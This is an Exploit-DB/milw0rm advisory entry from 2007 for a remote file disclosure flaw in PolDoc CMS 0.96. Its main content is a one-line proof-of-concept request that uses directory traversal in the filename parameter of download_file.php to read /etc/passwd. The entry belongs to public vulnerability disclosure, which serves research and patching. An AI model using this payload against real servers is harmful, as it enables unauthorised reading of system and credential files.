PolDoc CMS 0.96 - 'download_file.php' File Disclosure

EDB-ID:

4704

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-12-08

PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd

# milw0rm.com [2007-12-08]